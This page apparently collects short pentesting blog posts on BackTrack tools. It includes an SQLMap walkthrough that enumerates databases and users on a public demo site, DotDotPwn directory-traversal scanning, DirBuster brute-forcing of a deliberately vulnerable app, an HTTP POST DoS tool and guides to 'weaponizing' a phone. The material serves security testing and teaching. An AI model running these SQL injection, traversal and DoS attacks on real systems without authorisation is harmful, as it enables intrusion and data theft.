tools

 

BackTrack 5 R1 released

0

 

 

 

 

BackTrack guys have Released a Updated Version of BackTrack 5 with Lot of new Tools and Updates.for more Information check out the Below Link.

http://www.backtrack-linux.org/backtrack/backtrack-5-r1-released/

http://www.backtrack-linux.org/downloads/

 

Weaponizing Your Nokia N900 Mobile

0

 

Here is the list of Tools and Guides to Weaponizing ur Nokia n900 beast.

  1. Weaponizing the Nokia N900 – Part 1

https://www.infosecisland.com/blogvi…00-Part-1.html

2. Weaponizing the Nokia N900 – Part 2

https://www.infosecisland.com/blogvi…00-Part-2.html

3. Weaponizing the Nokia N900 – Part 3

https://www.infosecisland.com/blogvi…00-Part-3.html

4. Weaponizing the Nokia N900 – Part 3.5

http://zitstif.no-ip.org/?p=451

5. Weaponizing the Nokia N900 – Part 3.6 – Portable Rogue AP Point

http://zitstif.no-ip.org/?p=459

6. Weaponizing the Nokia N900 – Part 3.7 – More goodness and packet injection!

http://zitstif.no-ip.org/?p=473

7. Weaponizing the Nokia N900 – Part 3.8 – Backtrack 5 on N900

http://zitstif.no-ip.org/?p=484

 

BackTrack 5 Released

0

 

Finally

The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks.

This new revision has been built from scratch, and boasts several major improvements over all our previous releases.

http://www.backtrack-linux.org/backt…rack-5-release

http://www.backtrack-linux.org/downloads/

Direct Downloads

http://mirrors.rit.edu/backtrack/

 

OWASP HTTP Post Tool(layer 7 DDOS)

1

OWASP HTTP Post Tool was created to allow you to test your web applications to test availability concerns from HTTP GET and HTTP POST denial of service attacks -

Project

http://code.google.com/p/owasp-dos-http-post/downloads/list

Also checkout the Mitigating steps from slow HTTPS DDOS from ModSecurity

http://blog.spiderlabs.com/2010/11/advanced-topic-of-the-week-mitigating-slow-http-dos-attacks.html

Using SQLMap for sql Injection

0

We have been using lot of tools for sqlinjection while Pentesting today we will see how to use SQLMap a Open source Database Fingerprinting tool which works without much of the false positives,we will test this tool on http://testphp.vulnweb.com demo site.

  1. Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:52:47

[11:52:47] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:52:47] [INFO] resuming injection point ‘GET’ from session file
[11:52:47] [INFO] resuming injection parameter ‘cat’ from session file
[11:52:47] [INFO] resuming injection type ‘numeric’ from session file
[11:52:47] [INFO] resuming match ratio ’0.701′ from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5[*] shutting down at: 11:52:48

2)Finding the Database name and current user.


./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –current-db –current-user

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:57:13

[11:57:13] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:57:13] [INFO] resuming injection point ‘GET’ from session file
[11:57:13] [INFO] resuming injection parameter ‘cat’ from session file
[11:57:13] [INFO] resuming injection type ‘numeric’ from session file
[11:57:13] [INFO] resuming match ratio ’0.701′ from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    ‘acuart@localhost’

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
current database:    ‘acuart’

[11:58:45] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 11:58:45

3) Enumerate Databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 12:00:57

[12:00:58] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:00:58] [INFO] resuming injection point ‘GET’ from session file
[12:00:58] [INFO] resuming injection parameter ‘cat’ from session file
[12:00:58] [INFO] resuming injection type ‘numeric’ from session file
[12:00:58] [INFO] resuming match ratio ’0.701′ from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: 3
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: information_schema
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: modrewriteShop
available databases [3]:[*] acuart[*] information_schema[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 12:00:58
4) Enumerate Database tables and Columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –tables –columns

sqlmap/0.9-dev – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:03:27] [INFO] resuming injection point ‘GET’ from session file
[12:03:27] [INFO] resuming injection parameter ‘cat’ from session file
[12:03:27] [INFO] resuming injection type ‘numeric’ from session file
[12:03:27] [INFO] resuming match ratio ’0.701′ from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: 3
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: information_schema
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: modrewriteShop
[12:03:28] [INFO] fetching number of tables for database ‘information_schema’
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was So easy from this tool to enumerate the details next i will be telling on using sqlmap for Advanced techniques

Watobo on BackTrack4-RC2

0

Recently BackTrack4-R2 has been released with lot of updates,but i was not able to find the Awesome tool Watobo which i have been using in lot of Web Application Security Assessment,So today we will know how to install this tool on Bt box.run the below commands from the terminal

gem install rubgems-update -v 1.3.4
gem install hoe
gem install fxruby
install the firefox extension from here

http://wiki.openqa.org/display/WTR/FireWatir+Installation

Download the latest watobo version

http://sourceforge.net/projects/watobo/

unzip watobo_0.9.5rev226.zip
cd watobo_0.9.5rev226
ruby start_watobo.rb

Done watobo is ready on BT4-RC2

Find Websites Located on the Same Web Server

5

Below are the  links and tools will find ur neighbours(websites) hosted on the same sever,this will help us while doing Pentest on Web Application,bcz running scanner without seeing what other webistes are hosted on theserver some times leads to DOS on the server and all websites will be down.so chk  and tuneup ur scanner based on the requirements.

  1. http://www.yougetsignal.com/tools/web-sites-on-web-server/
  2. Get the IP adress of the website or server then go to www.bing.com and type IP:127.0.0.1(Server IP address) and search bing will do a lookup and show the results of all the websites located on the same server.
  3. Serverchk.py http://packetstormsecurity.org/UNIX/scanners/serverchk.rar
  4. http://www.my-ip-neighbors.com/

5.      If you’re using Linux then bing-ip2hosts also does this.

$ ./bing-ip2hosts www.websitename.com

U Can Download from here http://www.morningstarsecurity.com/research/bing-ip2hosts

DotDotPwn v1.0 Directory Traversal Scanner tool

1

Tool Intro:

  1. Detects Directory traversal vulnerabilities on remote HTTP/FTP server systems.
  2. Currently, the traversal database holds 881 attack payloads. Use the -update flag to perform an online fresh update.
  3. DotDotPwn checks the presence of boot.ini on the vulnerable systems through Directory traversal vulnerabilities, so it’s assumed that the tested systems are
  4. Windows based HTTP/FTP servers.

How to use

It requires perl with HTTP module

root@punter:/pentest/web# wget http://chr1x.sectester.net/toolz/ddpwn/ddpwn.tar.gz

root@punter:/pentest/web#tar -xvf ddpwn.tar.gz

root@punter:/pentest/web# perl -MCPAN -e ‘install HTTP::Lite’
root@punter:/pentest/web# ./ddpwn.pl -http 192.168.0.103

Project :http://chr1x.sectester.net/toolz/ddpwn/

Microsoft Releases Advisory to fix LNK Vulnerability

1

Microsoft has been released a Complete Advisory to fix the LNK Vulnerability and a  Detailed Guide and Steps have been given to fix it.

so System administrators make sure u follow the below guide and secure from this threat.

http://support.microsoft.com/kb/2286198

 

Bruteforcing directories and files names on Webapplication servers using DirBuster

1

During Web Application Pentest finding the Sensitive directories files and folders is always  a quite tough  work.

what is DirBuster

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

now i will be showing how to use Dirbuster to find sensitive directories and files in a web application , for the demo i will be using Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10.

  1. cd /pentest/web/dirbuster
  2. root@punter:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -u http://192.168.0.103/mutillidae/

now browse and select the directory bruteforce lists ex: directory-list-1.0.txt.

now run the start button u will see Dirbuster will start bruteforcing the dir and files.

see the results it has found /mutillidae/passwords/accounts.txt

Go to Top